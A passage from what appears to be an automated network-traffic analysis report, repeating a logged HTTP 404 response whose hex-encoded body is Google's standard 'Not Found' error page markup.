70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 